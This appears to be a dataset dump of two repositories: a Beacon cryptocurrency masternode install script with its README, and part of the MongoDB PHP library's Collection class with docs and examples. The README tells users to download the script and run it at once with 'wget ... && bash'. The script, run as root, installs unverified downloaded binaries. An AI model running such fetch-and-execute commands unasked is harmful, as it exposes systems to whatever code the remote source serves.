branch_name stringclasses 149 values | text stringlengths 23 89.3M | directory_id stringlengths 40 40 | languages listlengths 1 19 | num_files int64 1 11.8k | repo_language stringclasses 38 values | repo_name stringlengths 6 114 | revision_id stringlengths 40 40 | snapshot_id stringlengths 40 40 |
|---|---|---|---|---|---|---|---|---|
refs/heads/master | <file_sep>#/bin/bash
clear
if [ "$EUID" -ne 0 ] ; then
echo "Please run as root"
exit
fi
echo "Do you want to install all needed dependencies (no if you did it before)? [y/n]"
read DOSETUP
if [[ $DOSETUP =~ "y" ]] ; then
sudo apt-get update
apt-get install -y software-properties-common
sudo add-apt-repository -y ppa:bitcoin/bitcoin
sudo apt-get update
sudo apt-get -y upgrade
sudo apt-get -y dist-upgrade
sudo apt-get install -y automake unzip autoconf libminiupnpc-dev libevent-dev libboost-all-dev libzmq3-dev build-essential libtool autotools-dev pkg-config libssl-dev nano htop git curl libdb4.8-dev libdb4.8++-dev
cd /var
sudo touch swap.img
sudo chmod 600 swap.img
sudo dd if=/dev/zero of=/var/swap.img bs=1024k count=4000
sudo mkswap /var/swap.img
sudo swapon /var/swap.img
sudo free -mh
sudo echo "/var/swap.img none swap sw 0 0" >> /etc/fstab
cd
mkdir -p ~/bin
echo 'export PATH=~/bin:$PATH' > ~/.bash_aliases
source ~/.bashrc
fi
echo "Do you want to compile Daemon (please choose no if you did it before)? [y/n]"
read DOSETUPTWO
if [[ $DOSETUPTWO =~ "y" ]] ; then
beacon-cli stop > /dev/null 2>&1
wget https://github.com/beaconcrypto/beacon/releases/download/v1.1/becn11-daemon.zip
unzip becn11-daemon.zip
cp beacond /usr/local/bin/beacond
cp beacon-cli /usr/local/bin/beacon-cli
chmod +x /usr/local/bin/beacon*
fi
echo ""
echo "Configuring IP - Please Wait......."
declare -a NODE_IPS
for ips in $(netstat -i | awk '!/Kernel|Iface|lo/ {print $1," "}')
do
NODE_IPS+=($(curl --interface $ips --connect-timeout 2 -s4 icanhazip.com))
done
if [ ${#NODE_IPS[@]} -gt 1 ]
then
echo -e "More than one IP. Please type 0 to use the first IP, 1 for the second and so on...${NC}"
INDEX=0
for ip in "${NODE_IPS[@]}"
do
echo ${INDEX} $ip
let INDEX=${INDEX}+1
done
read -e choose_ip
IP=${NODE_IPS[$choose_ip]}
else
IP=${NODE_IPS[0]}
fi
echo "IP Done"
echo ""
echo "Enter masternode private key for node $ALIAS , Go To your Windows Wallet Tools > Debug Console , Type masternode genkey"
read PRIVKEY
CONF_DIR=~/.beacon/
CONF_FILE=beacon.conf
PORT=11115
mkdir -p $CONF_DIR
echo "rpcuser=user"`shuf -i 100000-10000000 -n 1` > $CONF_DIR/$CONF_FILE
echo "rpcpassword=<PASSWORD>"`shuf -i 100000-10000000 -n 1` >> $CONF_DIR/$CONF_FILE
echo "rpcallowip=127.0.0.1" >> $CONF_DIR/$CONF_FILE
echo "rpcport=11116" >> $CONF_DIR/$CONF_FILE
echo "listen=1" >> $CONF_DIR/$CONF_FILE
echo "server=1" >> $CONF_DIR/$CONF_FILE
echo "daemon=1" >> $CONF_DIR/$CONF_FILE
echo "logtimestamps=1" >> $CONF_DIR/$CONF_FILE
echo "masternode=1" >> $CONF_DIR/$CONF_FILE
echo "port=$PORT" >> $CONF_DIR/$CONF_FILE
echo "masternodeaddr=$IP:$PORT" >> $CONF_DIR/$CONF_FILE
echo "masternodeprivkey=$PRIVKEY" >> $CONF_DIR/$CONF_FILE
beacond --daemon
<file_sep># beacon-mn-setup
Beacon MN setup scripts & Guides
## beacon-mn.sh - Beacon MN install script (run it as root)
wget https://raw.githubusercontent.com/beaconcrypto/beacon-mn-setup/master/beacon_mn.sh && bash beacon_mn.sh
| f2575439c4339e64ac339a45e208089353967783 | [
"Markdown",
"Shell"
] | 2 | Shell | beaconcrypto/beacon-mn-setup | 90a5f91cac7c64b3a4c276fb53bb607fef3982e8 | 6e835b5713da69dc2981c85aaa47a87d8fb27297 |
refs/heads/master | <file_sep><?php
namespace MongoDB\Exception;
class RuntimeException extends \RuntimeException implements Exception
{
}
<file_sep># Usage
## Collection class
`MongoDB\Collection` is perhaps the most useful class in this library. It
provides methods for common operations on a collection, such as inserting
documents, querying, updating, counting, etc.
Constructing a `MongoDB\Collection` requires a `MongoDB\Manager` and a namespace
for the collection. A [MongoDB namespace](http://docs.mongodb.org/manual/faq/developers/#faq-dev-namespace)
consists of a database name and collection name joined by a dot. `examples.zips`
is on example of a namespace. A [write concern](http://docs.mongodb.org/manual/core/write-concern/)
and [read preference](http://docs.mongodb.org/manual/core/read-preference/) may
also be provided when constructing a Collection (if omitted, the Collection will
use the Manager's values as its defaults).
## Finding a specific document
```
<?php
// This path should point to Composer's autoloader
require_once __DIR__ . "/vendor/autoload.php";
$manager = new MongoDB\Driver\Manager("mongodb://localhost:27017");
$collection = new MongoDB\Collection($manager, "examples.zips");
$sunnyvale = $collection->findOne(array("_id" => "94086"));
var_dump($sunnyvale);
?>
```
Executing this script should yield the following output:
```
array(5) {
["_id"]=>
string(5) "94086"
["city"]=>
string(9) "SUNNYVALE"
["loc"]=>
array(2) {
[0]=>
float(-122.023771)
[1]=>
float(37.376407)
}
["pop"]=>
int(56215)
["state"]=>
string(2) "CA"
}
```
<file_sep><?php
$file = "http://media.mongodb.org/zips.json";
$zips = file($file, FILE_IGNORE_NEW_LINES);
$batch = new MongoDB\WriteBatch(true);
foreach($zips as $string) {
$document = json_decode($string);
$batch->insert($document);
}
$manager = new MongoDB\Manager("mongodb://localhost");
$result = $manager->executeWriteBatch("examples.zips", $batch);
printf("Inserted %d documents\n", $result->getInsertedCount());
?>
<file_sep><?php
namespace MongoDB;
use MongoDB\Driver\BulkWrite;
use MongoDB\Driver\Command;
use MongoDB\Driver\Cursor;
use MongoDB\Driver\Manager;
use MongoDB\Driver\Query;
use MongoDB\Driver\ReadPreference;
use MongoDB\Driver\Server;
use MongoDB\Driver\WriteConcern;
use MongoDB\Exception\InvalidArgumentException;
use MongoDB\Exception\UnexpectedTypeException;
use MongoDB\Model\IndexInfoIterator;
use MongoDB\Model\IndexInfoIteratorIterator;
use MongoDB\Model\IndexInput;
class Collection
{
const VERSION = "0.1.0";
/* {{{ consts & vars */
const QUERY_FLAG_TAILABLE_CURSOR = 0x02;
const QUERY_FLAG_SLAVE_OKAY = 0x04;
const QUERY_FLAG_OPLOG_REPLY = 0x08;
const QUERY_FLAG_NO_CURSOR_TIMEOUT = 0x10;
const QUERY_FLAG_AWAIT_DATA = 0x20;
const QUERY_FLAG_EXHAUST = 0x40;
const QUERY_FLAG_PARTIAL = 0x80;
const CURSOR_TYPE_NON_TAILABLE = 0x00;
const CURSOR_TYPE_TAILABLE = self::QUERY_FLAG_TAILABLE_CURSOR;
//self::QUERY_FLAG_TAILABLE_CURSOR | self::QUERY_FLAG_AWAIT_DATA;
const CURSOR_TYPE_TAILABLE_AWAIT = 0x22;
const FIND_ONE_AND_RETURN_BEFORE = 0x01;
const FIND_ONE_AND_RETURN_AFTER = 0x02;
protected $manager;
protected $ns;
protected $wc;
protected $rp;
protected $dbname;
protected $collname;
/* }}} */
/**
* Constructs new Collection instance.
*
* This class provides methods for collection-specific operations, such as
* CRUD (i.e. create, read, update, and delete) and index management.
*
* @param Manager $manager Manager instance from the driver
* @param string $namespace Collection namespace (e.g. "db.collection")
* @param WriteConcern $writeConcern Default write concern to apply
* @param ReadPreference $readPreference Default read preference to apply
*/
public function __construct(Manager $manager, $namespace, WriteConcern $writeConcern = null, ReadPreference $readPreference = null)
{
$this->manager = $manager;
$this->ns = (string) $namespace;
$this->wc = $writeConcern;
$this->rp = $readPreference;
list($this->dbname, $this->collname) = explode(".", $namespace, 2);
}
/**
* Return the collection namespace.
*
* @param string
*/
public function __toString()
{
return $this->ns;
}
/**
* Runs an aggregation framework pipeline
*
* Note: this method's return value depends on the MongoDB server version
* and the "useCursor" option. If "useCursor" is true, a Cursor will be
* returned; otherwise, an ArrayIterator is returned, which wraps the
* "result" array from the command response document.
*
* @see http://docs.mongodb.org/manual/reference/command/aggregate/
*
* @param array $pipeline The pipeline to execute
* @param array $options Additional options
* @return Iterator
*/
public function aggregate(array $pipeline, array $options = array())
{
$readPreference = new ReadPreference(ReadPreference::RP_PRIMARY);
$server = $this->manager->selectServer($readPreference);
if (FeatureDetection::isSupported($server, FeatureDetection::API_AGGREGATE_CURSOR)) {
$options = array_merge(
array(
/**
* Enables writing to temporary files. When set to true, aggregation stages
* can write data to the _tmp subdirectory in the dbPath directory. The
* default is false.
*
* @see http://docs.mongodb.org/manual/reference/command/aggregate/
*/
'allowDiskUse' => false,
/**
* The number of documents to return per batch.
*
* @see http://docs.mongodb.org/manual/reference/command/aggregate/
*/
'batchSize' => 0,
/**
* The maximum amount of time to allow the query to run.
*
* @see http://docs.mongodb.org/manual/reference/command/aggregate/
*/
'maxTimeMS' => 0,
/**
* Indicates if the results should be provided as a cursor.
*
* @see http://docs.mongodb.org/manual/reference/command/aggregate/
*/
'useCursor' => true,
),
$options
);
}
$options = $this->_massageAggregateOptions($options);
$command = new Command(array(
'aggregate' => $this->collname,
'pipeline' => $pipeline,
) + $options);
$cursor = $server->executeCommand($this->dbname, $command);
if ( ! empty($options["cursor"])) {
return $cursor;
}
$doc = current($cursor->toArray());
if ($doc["ok"]) {
return new \ArrayIterator(array_map(
function (\stdClass $document) { return (array) $document; },
$doc["result"]
));
}
throw $this->_generateCommandException($doc);
}
/**
* Adds a full set of write operations into a bulk and executes it
*
* The syntax of the $bulk array is:
* $bulk = [
* [
* 'METHOD' => [
* $document,
* $extraArgument1,
* $extraArgument2,
* ],
* ],
* [
* 'METHOD' => [
* $document,
* $extraArgument1,
* $extraArgument2,
* ],
* ],
* ]
*
*
* Where METHOD is one of
* - 'insertOne'
* Supports no $extraArgument
* - 'updateMany'
* Requires $extraArgument1, same as $update for Collection::updateMany()
* Optional $extraArgument2, same as $options for Collection::updateMany()
* - 'updateOne'
* Requires $extraArgument1, same as $update for Collection::updateOne()
* Optional $extraArgument2, same as $options for Collection::updateOne()
* - 'replaceOne'
* Requires $extraArgument1, same as $update for Collection::replaceOne()
* Optional $extraArgument2, same as $options for Collection::replaceOne()
* - 'deleteOne'
* Supports no $extraArgument
* - 'deleteMany'
* Supports no $extraArgument
*
* @example Collection-bulkWrite.php Using Collection::bulkWrite()
*
* @see Collection::getBulkOptions() for supported $options
*
* @param array $ops Array of operations
* @param array $options Additional options
* @return WriteResult
*/
public function bulkWrite(array $ops, array $options = array())
{
$options = array_merge($this->getBulkOptions(), $options);
$bulk = new BulkWrite($options["ordered"]);
$insertedIds = array();
foreach ($ops as $n => $op) {
foreach ($op as $opname => $args) {
if (!isset($args[0])) {
throw new InvalidArgumentException(sprintf("Missing argument#1 for '%s' (operation#%d)", $opname, $n));
}
switch ($opname) {
case "insertOne":
$insertedId = $bulk->insert($args[0]);
if ($insertedId !== null) {
$insertedIds[$n] = $insertedId;
} else {
$insertedIds[$n] = is_array($args[0]) ? $args[0]['_id'] : $args[0]->_id;
}
break;
case "updateMany":
if (!isset($args[1])) {
throw new InvalidArgumentException(sprintf("Missing argument#2 for '%s' (operation#%d)", $opname, $n));
}
$options = array_merge($this->getWriteOptions(), isset($args[2]) ? $args[2] : array(), array("multi" => true));
$firstKey = key($args[1]);
if (!isset($firstKey[0]) || $firstKey[0] != '$') {
throw new InvalidArgumentException("First key in \$update must be a \$operator");
}
$bulk->update($args[0], $args[1], $options);
break;
case "updateOne":
if (!isset($args[1])) {
throw new InvalidArgumentException(sprintf("Missing argument#2 for '%s' (operation#%d)", $opname, $n));
}
$options = array_merge($this->getWriteOptions(), isset($args[2]) ? $args[2] : array(), array("multi" => false));
$firstKey = key($args[1]);
if (!isset($firstKey[0]) || $firstKey[0] != '$') {
throw new InvalidArgumentException("First key in \$update must be a \$operator");
}
$bulk->update($args[0], $args[1], $options);
break;
case "replaceOne":
if (!isset($args[1])) {
throw new InvalidArgumentException(sprintf("Missing argument#2 for '%s' (operation#%d)", $opname, $n));
}
$options = array_merge($this->getWriteOptions(), isset($args[2]) ? $args[2] : array(), array("multi" => false));
$firstKey = key($args[1]);
if (isset($firstKey[0]) && $firstKey[0] == '$') {
throw new InvalidArgumentException("First key in \$update must NOT be a \$operator");
}
$bulk->update($args[0], $args[1], $options);
break;
case "deleteOne":
$options = array_merge($this->getWriteOptions(), isset($args[1]) ? $args[1] : array(), array("limit" => 1));
$bulk->delete($args[0], $options);
break;
case "deleteMany":
$options = array_merge($this->getWriteOptions(), isset($args[1]) ? $args[1] : array(), array("limit" => 0));
$bulk->delete($args[0], $options);
break;
default:
throw new InvalidArgumentException(sprintf("Unknown operation type called '%s' (operation#%d)", $opname, $n));
}
}
}
$writeResult = $this->manager->executeBulkWrite($this->ns, $bulk, $this->wc);
return new BulkWriteResult($writeResult, $insertedIds);
}
/**
* Counts all documents matching $filter
* If no $filter provided, returns the numbers of documents in the collection
*
* @see http://docs.mongodb.org/manual/reference/command/count/
* @see Collection::getCountOptions() for supported $options
*
* @param array $filter The find query to execute
* @param array $options Additional options
* @return integer
*/
public function count(array $filter = array(), array $options = array())
{
$cmd = array(
"count" => $this->collname,
"query" => (object) $filter,
) + $options;
$doc = current($this->_runCommand($this->dbname, $cmd)->toArray());
if ($doc["ok"]) {
return (integer) $doc["n"];
}
throw $this->_generateCommandException($doc);
}
/**
* Create a single index for the collection.
*
* @see http://docs.mongodb.org/manual/reference/command/createIndexes/
* @see http://docs.mongodb.org/manual/reference/method/db.collection.createIndex/
* @see Collection::createIndexes()
* @param array|object $key Document containing fields mapped to values,
* which denote order or an index type
* @param array $options Index options
* @return string The name of the created index
*/
public function createIndex($key, array $options = array())
{
return current($this->createIndexes(array(array('key' => $key) + $options)));
}
/**
* Create one or more indexes for the collection.
*
* Each element in the $indexes array must have a "key" document, which
* contains fields mapped to an order or type. Other options may follow.
* For example:
*
* $indexes = [
* // Create a unique index on the "username" field
* [ 'key' => [ 'username' => 1 ], 'unique' => true ],
* // Create a 2dsphere index on the "loc" field with a custom name
* [ 'key' => [ 'loc' => '2dsphere' ], 'name' => 'geo' ],
* ];
*
* If the "name" option is unspecified, a name will be generated from the
* "key" document.
*
* @see http://docs.mongodb.org/manual/reference/command/createIndexes/
* @see http://docs.mongodb.org/manual/reference/method/db.collection.createIndex/
* @param array $indexes List of index specifications
* @return string[] The names of the created indexes
* @throws InvalidArgumentException if an index specification is invalid
*/
public function createIndexes(array $indexes)
{
if (empty($indexes)) {
return array();
}
foreach ($indexes as $i => $index) {
if ( ! is_array($index)) {
throw new UnexpectedTypeException($index, 'array');
}
if ( ! isset($index['ns'])) {
$index['ns'] = $this->ns;
}
$indexes[$i] = new IndexInput($index);
}
$readPreference = new ReadPreference(ReadPreference::RP_PRIMARY);
$server = $this->manager->selectServer($readPreference);
return (FeatureDetection::isSupported($server, FeatureDetection::API_CREATEINDEXES_CMD))
? $this->createIndexesCommand($server, $indexes)
: $this->createIndexesLegacy($server, $indexes);
}
/**
* Deletes a document matching the $filter criteria.
* NOTE: Will delete ALL documents matching $filter
*
* @see http://docs.mongodb.org/manual/reference/command/delete/
*
* @param array $filter The $filter criteria to delete
* @return DeleteResult
*/
public function deleteMany(array $filter)
{
$wr = $this->_delete($filter, 0);
return new DeleteResult($wr);
}
/**
* Deletes a document matching the $filter criteria.
* NOTE: Will delete at most ONE document matching $filter
*
* @see http://docs.mongodb.org/manual/reference/command/delete/
*
* @param array $filter The $filter criteria to delete
* @return DeleteResult
*/
public function deleteOne(array $filter)
{
$wr = $this->_delete($filter);
return new DeleteResult($wr);
}
/**
* Finds the distinct values for a specified field across the collection
*
* @see http://docs.mongodb.org/manual/reference/command/distinct/
* @see Collection::getDistinctOptions() for supported $options
*
* @param string $fieldName The fieldname to use
* @param array $filter The find query to execute
* @param array $options Additional options
* @return integer
*/
public function distinct($fieldName, array $filter = array(), array $options = array())
{
$options = array_merge($this->getDistinctOptions(), $options);
$cmd = array(
"distinct" => $this->collname,
"key" => $fieldName,
"query" => (object) $filter,
) + $options;
$doc = current($this->_runCommand($this->dbname, $cmd)->toArray());
if ($doc["ok"]) {
return $doc["values"];
}
throw $this->_generateCommandException($doc);
}
/**
* Drop this collection.
*
* @see http://docs.mongodb.org/manual/reference/command/drop/
* @return Cursor
*/
public function drop()
{
$command = new Command(array('drop' => $this->collname));
$readPreference = new ReadPreference(ReadPreference::RP_PRIMARY);
return $this->manager->executeCommand($this->dbname, $command, $readPreference);
}
/**
* Drop a single index in the collection.
*
* @see http://docs.mongodb.org/manual/reference/command/dropIndexes/
* @see http://docs.mongodb.org/manual/reference/method/db.collection.dropIndex/
* @param string $indexName
* @return Cursor
* @throws InvalidArgumentException if $indexName is an empty string or "*"
*/
public function dropIndex($indexName)
{
$indexName = (string) $indexName;
if ($indexName === '') {
throw new InvalidArgumentException('Index name cannot be empty');
}
if ($indexName === '*') {
throw new InvalidArgumentException('dropIndexes() must be used to drop multiple indexes');
}
$command = new Command(array('dropIndexes' => $this->collname, 'index' => $indexName));
$readPreference = new ReadPreference(ReadPreference::RP_PRIMARY);
return $this->manager->executeCommand($this->dbname, $command, $readPreference);
}
/**
* Drop all indexes in the collection.
*
* @see http://docs.mongodb.org/manual/reference/command/dropIndexes/
* @see http://docs.mongodb.org/manual/reference/method/db.collection.dropIndexes/
* @return Cursor
*/
public function dropIndexes()
{
$command = new Command(array('dropIndexes' => $this->collname, 'index' => '*'));
$readPreference = new ReadPreference(ReadPreference::RP_PRIMARY);
return $this->manager->executeCommand($this->dbname, $command, $readPreference);
}
/**
* Performs a find (query) on the collection
*
* @see http://docs.mongodb.org/manual/core/read-operations-introduction/
* @see Collection::getFindOptions() for supported $options
*
* @param array $filter The find query to execute
* @param array $options Additional options
* @return Cursor
*/
public function find(array $filter = array(), array $options = array())
{
$options = array_merge($this->getFindOptions(), $options);
$query = $this->_buildQuery($filter, $options);
$cursor = $this->manager->executeQuery($this->ns, $query, $this->rp);
return $cursor;
}
/**
* Performs a find (query) on the collection, returning at most one result
*
* @see http://docs.mongodb.org/manual/core/read-operations-introduction/
* @see Collection::getFindOptions() for supported $options
*
* @param array $filter The find query to execute
* @param array $options Additional options
* @return array|false The matched document, or false on failure
*/
public function findOne(array $filter = array(), array $options = array())
{
$options = array_merge($this->getFindOptions(), array("limit" => 1), $options);
$query = $this->_buildQuery($filter, $options);
$cursor = $this->manager->executeQuery($this->ns, $query, $this->rp);
$array = iterator_to_array($cursor);
if ($array) {
return $array[0];
}
return false;
}
/**
* Finds a single document and deletes it, returning the original.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
* @see Collection::getFindOneAndDelete() for supported $options
*
* @param array $filter The $filter criteria to search for
* @param array $options Additional options
* @return array The original document
*/
public function findOneAndDelete(array $filter, array $options = array())
{
$options = array_merge($this->getFindOneAndDeleteOptions(), $options);
$options = $this->_massageFindAndModifyOptions($options);
$cmd = array(
"findandmodify" => $this->collname,
"query" => $filter,
) + $options;
$doc = current($this->_runCommand($this->dbname, $cmd)->toArray());
if ($doc["ok"]) {
return is_object($doc["value"]) ? (array) $doc["value"] : $doc["value"];
}
throw $this->_generateCommandException($doc);
}
/**
* Finds a single document and replaces it, returning either the original or the replaced document
* By default, returns the original document.
* To return the new document set:
* $options = array("returnDocument" => Collection::FIND_ONE_AND_RETURN_AFTER);
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
* @see Collection::getFindOneAndReplace() for supported $options
*
* @param array $filter The $filter criteria to search for
* @param array $replacement The document to replace with
* @param array $options Additional options
* @return array
*/
public function findOneAndReplace(array $filter, array $replacement, array $options = array())
{
$firstKey = key($replacement);
if (isset($firstKey[0]) && $firstKey[0] == '$') {
throw new InvalidArgumentException("First key in \$replacement must NOT be a \$operator");
}
$options = array_merge($this->getFindOneAndReplaceOptions(), $options);
$options = $this->_massageFindAndModifyOptions($options, $replacement);
$cmd = array(
"findandmodify" => $this->collname,
"query" => $filter,
) + $options;
$doc = current($this->_runCommand($this->dbname, $cmd)->toArray());
if ($doc["ok"]) {
return $this->_massageFindAndModifyResult($doc, $options);
}
throw $this->_generateCommandException($doc);
}
/**
* Finds a single document and updates it, returning either the original or the updated document
* By default, returns the original document.
* To return the new document set:
* $options = array("returnDocument" => Collection::FIND_ONE_AND_RETURN_AFTER);
*
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
* @see Collection::getFindOneAndUpdate() for supported $options
*
* @param array $filter The $filter criteria to search for
* @param array $update An array of update operators to apply to the document
* @param array $options Additional options
* @return array
*/
public function findOneAndUpdate(array $filter, array $update, array $options = array())
{
$firstKey = key($update);
if (!isset($firstKey[0]) || $firstKey[0] != '$') {
throw new InvalidArgumentException("First key in \$update must be a \$operator");
}
$options = array_merge($this->getFindOneAndUpdateOptions(), $options);
$options = $this->_massageFindAndModifyOptions($options, $update);
$cmd = array(
"findandmodify" => $this->collname,
"query" => $filter,
) + $options;
$doc = current($this->_runCommand($this->dbname, $cmd)->toArray());
if ($doc["ok"]) {
return $this->_massageFindAndModifyResult($doc, $options);
}
throw $this->_generateCommandException($doc);
}
/**
* Retrieves all Bulk Write options with their default values.
*
* @return array of available Bulk Write options
*/
public function getBulkOptions()
{
return array(
"ordered" => false,
);
}
/**
* Return the collection name.
*
* @return string
*/
public function getCollectionName()
{
return $this->collname;
}
/**
* Retrieves all count options with their default values.
*
* @return array of Collection::count() options
*/
public function getCountOptions()
{
return array(
/**
* The index to use.
*
* @see http://docs.mongodb.org/manual/reference/command/count/
*/
"hint" => "", // string or document
/**
* The maximum number of documents to count.
*
* @see http://docs.mongodb.org/manual/reference/command/count/
*/
"limit" => 0,
/**
* The maximum amount of time to allow the query to run.
*
* @see http://docs.mongodb.org/manual/reference/command/count/
*/
"maxTimeMS" => 0,
/**
* The number of documents to skip before returning the documents.
*
* @see http://docs.mongodb.org/manual/reference/command/count/
*/
"skip" => 0,
);
}
/**
* Return the database name.
*
* @return string
*/
public function getDatabaseName()
{
return $this->dbname;
}
/**
* Retrieves all distinct options with their default values.
*
* @return array of Collection::distinct() options
*/
public function getDistinctOptions()
{
return array(
/**
* The maximum amount of time to allow the query to run. The default is infinite.
*
* @see http://docs.mongodb.org/manual/reference/command/distinct/
*/
"maxTimeMS" => 0,
);
}
/**
* Retrieves all findOneDelete options with their default values.
*
* @return array of Collection::findOneAndDelete() options
*/
public function getFindOneAndDeleteOptions()
{
return array(
/**
* The maximum amount of time to allow the query to run.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"maxTimeMS" => 0,
/**
* Limits the fields to return for all matching documents.
*
* @see http://docs.mongodb.org/manual/tutorial/project-fields-from-query-results
*/
"projection" => array(),
/**
* Determines which document the operation modifies if the query selects multiple documents.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"sort" => array(),
);
}
/**
* Retrieves all findOneAndReplace options with their default values.
*
* @return array of Collection::findOneAndReplace() options
*/
public function getFindOneAndReplaceOptions()
{
return array(
/**
* The maximum amount of time to allow the query to run.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"maxTimeMS" => 0,
/**
* Limits the fields to return for all matching documents.
*
* @see http://docs.mongodb.org/manual/tutorial/project-fields-from-query-results
*/
"projection" => array(),
/**
* When ReturnDocument.After, returns the replaced or inserted document rather than the original.
* Defaults to ReturnDocument.Before.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"returnDocument" => self::FIND_ONE_AND_RETURN_BEFORE,
/**
* Determines which document the operation modifies if the query selects multiple documents.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"sort" => array(),
/**
* When true, findAndModify creates a new document if no document matches the query. The
* default is false.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"upsert" => false,
);
}
/**
* Retrieves all findOneAndUpdate options with their default values.
*
* @return array of Collection::findOneAndUpdate() options
*/
public function getFindOneAndUpdateOptions()
{
return array(
/**
* The maximum amount of time to allow the query to run.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"maxTimeMS" => 0,
/**
* Limits the fields to return for all matching documents.
*
* @see http://docs.mongodb.org/manual/tutorial/project-fields-from-query-results
*/
"projection" => array(),
/**
* When ReturnDocument.After, returns the updated or inserted document rather than the original.
* Defaults to ReturnDocument.Before.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"returnDocument" => self::FIND_ONE_AND_RETURN_BEFORE,
/**
* Determines which document the operation modifies if the query selects multiple documents.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"sort" => array(),
/**
* When true, creates a new document if no document matches the query. The default is false.
*
* @see http://docs.mongodb.org/manual/reference/command/findAndModify/
*/
"upsert" => false,
);
}
/**
* Retrieves all find options with their default values.
*
* @return array of Collection::find() options
*/
public function getFindOptions()
{
return array(
/**
* Get partial results from a mongos if some shards are down (instead of throwing an error).
*
* @see http://docs.mongodb.org/meta-driver/latest/legacy/mongodb-wire-protocol/#op-query
*/
"allowPartialResults" => false,
/**
* The number of documents to return per batch.
*
* @see http://docs.mongodb.org/manual/reference/method/cursor.batchSize/
*/
"batchSize" => 101,
/**
* Attaches a comment to the query. If $comment also exists
* in the modifiers document, the comment field overwrites $comment.
*
* @see http://docs.mongodb.org/manual/reference/operator/meta/comment/
*/
"comment" => "",
/**
* Indicates the type of cursor to use. This value includes both
* the tailable and awaitData options.
* The default is Collection::CURSOR_TYPE_NON_TAILABLE.
*
* @see http://docs.mongodb.org/manual/reference/operator/meta/comment/
*/
"cursorType" => self::CURSOR_TYPE_NON_TAILABLE,
/**
* The maximum number of documents to return.
*
* @see http://docs.mongodb.org/manual/reference/method/cursor.limit/
*/
"limit" => 0,
/**
* The maximum amount of time to allow the query to run. If $maxTimeMS also exists
* in the modifiers document, the maxTimeMS field overwrites $maxTimeMS.
*
* @see http://docs.mongodb.org/manual/reference/operator/meta/maxTimeMS/
*/
"maxTimeMS" => 0,
/**
* Meta-operators modifying the output or behavior of a query.
*
* @see http://docs.mongodb.org/manual/reference/operator/query-modifier/
*/
"modifiers" => array(),
/**
* The server normally times out idle cursors after an inactivity period (10 minutes)
* to prevent excess memory use. Set this option to prevent that.
*
* @see http://docs.mongodb.org/meta-driver/latest/legacy/mongodb-wire-protocol/#op-query
*/
"noCursorTimeout" => false,
/**
* Internal replication use only - driver should not set
*
* @see http://docs.mongodb.org/meta-driver/latest/legacy/mongodb-wire-protocol/#op-query
* @internal
*/
"oplogReplay" => false,
/**
* Limits the fields to return for all matching documents.
*
* @see http://docs.mongodb.org/manual/tutorial/project-fields-from-query-results/
*/
"projection" => array(),
/**
* The number of documents to skip before returning.
*
* @see http://docs.mongodb.org/manual/reference/method/cursor.skip/
*/
"skip" => 0,
/**
* The order in which to return matching documents. If $orderby also exists
* in the modifiers document, the sort field overwrites $orderby.
*
* @see http://docs.mongodb.org/manual/reference/method/cursor.sort/
*/
"sort" => array(),
);
}
/**
* Return the collection namespace.
*
* @see http://docs.mongodb.org/manual/faq/developers/#faq-dev-namespace
* @return string
*/
public function getNamespace()
{
return $this->ns;
}
/**
* Retrieves all Write options with their default values.
*
* @return array of available Write options
*/
public function getWriteOptions()
{
return array(
"ordered" => false,
"upsert" => false,
"limit" => 1,
);
}
/**
* Inserts the provided documents
*
* @see http://docs.mongodb.org/manual/reference/command/insert/
*
* @param array[]|object[] $documents The documents to insert
* @return InsertManyResult
*/
public function insertMany(array $documents)
{
$options = array_merge($this->getWriteOptions());
$bulk = new BulkWrite($options["ordered"]);
$insertedIds = array();
foreach ($documents as $i => $document) {
$insertedId = $bulk->insert($document);
if ($insertedId !== null) {
$insertedIds[$i] = $insertedId;
} else {
$insertedIds[$i] = is_array($document) ? $document['_id'] : $document->_id;
}
}
$writeResult = $this->manager->executeBulkWrite($this->ns, $bulk, $this->wc);
return new InsertManyResult($writeResult, $insertedIds);
}
/**
* Inserts the provided document
*
* @see http://docs.mongodb.org/manual/reference/command/insert/
*
* @param array|object $document The document to insert
* @return InsertOneResult
*/
public function insertOne($document)
{
$options = array_merge($this->getWriteOptions());
$bulk = new BulkWrite($options["ordered"]);
$id = $bulk->insert($document);
$wr = $this->manager->executeBulkWrite($this->ns, $bulk, $this->wc);
if ($id === null) {
$id = is_array($document) ? $document['_id'] : $document->_id;
}
return new InsertOneResult($wr, $id);
}
/**
* Returns information for all indexes for the collection.
*
* @see http://docs.mongodb.org/manual/reference/command/listIndexes/
* @see http://docs.mongodb.org/manual/reference/method/db.collection.getIndexes/
* @return IndexInfoIterator
*/
public function listIndexes()
{
$readPreference = new ReadPreference(ReadPreference::RP_PRIMARY);
$server = $this->manager->selectServer($readPreference);
return (FeatureDetection::isSupported($server, FeatureDetection::API_LISTINDEXES_CMD))
? $this->listIndexesCommand($server)
: $this->listIndexesLegacy($server);
}
/**
* Replace one document
*
* @see http://docs.mongodb.org/manual/reference/command/update/
* @see Collection::getWriteOptions() for supported $options
*
* @param array $filter The document to be replaced
* @param array $update The document to replace with
* @param array $options Additional options
* @return UpdateResult
*/
public function replaceOne(array $filter, array $update, array $options = array())
{
$firstKey = key($update);
if (isset($firstKey[0]) && $firstKey[0] == '$') {
throw new InvalidArgumentException("First key in \$update must NOT be a \$operator");
}
$wr = $this->_update($filter, $update, $options + array("multi" => false));
return new UpdateResult($wr);
}
/**
* Update one document
* NOTE: Will update ALL documents matching $filter
*
* @see http://docs.mongodb.org/manual/reference/command/update/
* @see Collection::getWriteOptions() for supported $options
*
* @param array $filter The document to be replaced
* @param array $update An array of update operators to apply to the document
* @param array $options Additional options
* @return UpdateResult
*/
public function updateMany(array $filter, $update, array $options = array())
{
$wr = $this->_update($filter, $update, $options + array("multi" => true));
return new UpdateResult($wr);
}
/**
* Update one document
